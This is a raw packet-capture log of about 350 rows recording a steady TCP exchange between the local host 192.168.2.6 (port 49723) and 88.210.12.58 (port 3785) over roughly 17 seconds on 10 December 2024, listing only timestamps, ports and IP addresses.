Dec 10, 2024 09:00:15.232233047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.308785915 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.326508999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.408051968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.428177118 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.508793116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.527501106 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.608052969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.628204107 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.710809946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.727566957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.812792063 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.830244064 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.912796021 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.932168961 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.010078907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.032361984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.111076117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.129790068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.212083101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.230392933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.313091993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.331494093 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.414062023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.432538033 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.514110088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.533499002 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.614136934 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.642016888 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.714054108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.733594894 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.815160036 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.833564997 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:16.915108919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:16.934587955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.018922091 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.034704924 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.116056919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.138843060 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.217072964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.235656977 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.318897963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.336672068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.418812037 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.438842058 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.517061949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.538259029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.620789051 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.639365911 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.718116045 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.740206957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.820796967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.837558985 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:17.920069933 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:17.940886021 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:18.021188974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:18.039521933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:18.130229950 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:18.140741110 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:18.249876022 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:18.432214022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:18.551764965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:18.740113974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:18.841094971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:18.859574080 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:18.942131996 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:18.960465908 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.044796944 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.061602116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.144793987 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.164494038 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.243066072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.264229059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.343071938 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.362591982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.444067001 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.462584972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.546979904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.563728094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.646843910 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.666459084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.746077061 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.766388893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.847160101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.865663052 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:19.947201967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:19.966753006 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.048110008 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.066942930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.149079084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.167928934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.252096891 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.268543005 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.353104115 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.371542931 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.453087091 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.472554922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.554074049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.572563887 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.654196978 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.673654079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.755070925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.773753881 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.855201006 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.874702930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:20.967271090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:20.974852085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.070918083 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.087615967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.174957991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.190542936 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.294518948 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.294564962 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.396473885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.414417982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.496073961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.516047001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.599857092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.615688086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.698080063 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.719453096 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.798067093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.817748070 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:21.900810003 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:21.917588949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.000808954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.020380974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.100112915 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.120465040 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.201097965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.219712019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.301130056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.320724964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.402089119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.420643091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.503072023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.521594048 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.603105068 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.622628927 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.704066038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.723005056 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.804135084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.823489904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:22.904217005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:22.923554897 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.004086018 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.023658037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.107364893 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.123938084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.206798077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.226973057 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.305074930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.326499939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.406086922 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.424598932 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.508799076 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.525657892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.608809948 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.629110098 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.709568024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.728310108 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.813445091 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:23.829446077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:23.932847023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.017615080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.137245893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.322082043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.422169924 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.441518068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.523092985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.541739941 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.623119116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.642591000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.724088907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.742646933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.824120998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.843848944 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:24.925092936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:24.943675041 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.025064945 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.044573069 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.126076937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.144754887 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.225061893 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.245479107 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.328788042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.344479084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.428666115 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.448276997 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.528789997 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.548095942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.628793001 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.649595976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.728794098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.748301983 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.828071117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.848144054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:25.929052114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:25.947566986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.030117035 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.048491955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.131170988 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.149663925 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.232203007 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.251096010 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.332170010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.351670980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.433191061 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.451721907 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.534063101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.553059101 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.635077000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.653584003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.754729986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:26.840866089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.944544077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:26.960452080 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.049700022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.064064980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.150075912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.169326067 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.250288963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.269674063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.352797031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.369765997 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.451244116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.472258091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.551223040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.570697069 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.651092052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.670870066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.752798080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.770656109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.852072001 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.872204065 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:27.953201056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:27.971507072 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.053153038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.072570086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.154144049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.172924042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.255101919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.273613930 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.356085062 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.374485016 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.456165075 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.475596905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.556107044 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.576323032 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.656073093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.676074982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.756117105 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.775620937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.857126951 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.875694990 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:28.957093954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:28.976756096 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.057080984 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.076575041 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.158216953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.177161932 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.260911942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.277648926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.360797882 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.380374908 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.462428093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.480226040 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.564810991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.581897974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.684287071 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.772422075 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.880815029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:29.891921043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:29.980811119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.000302076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.080110073 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.100465059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.180119038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.199547052 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.281220913 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.299504042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.382163048 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.400630951 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.483114004 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.501701117 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.583100080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.602514029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.684195042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.702563047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.785100937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.803740025 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.885107040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:30.904594898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:30.986131907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.004618883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.089812994 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.105734110 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.190119982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.209501028 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.292390108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.309588909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.392811060 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.411899090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.492810965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.512250900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.592803955 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.612198114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.692152977 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.712292910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.793143034 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.811539888 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.894123077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:31.912846088 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:31.995093107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.013652086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.097640991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.114638090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.198117971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.217139959 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.299101114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.317553043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.400142908 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.418607950 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.501111984 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.519855976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.601068974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.620744944 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.702069998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.720762968 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.802108049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.821392059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:32.903088093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:32.921876907 CET	3785	49723	88.210.12.58	192.168.2.6
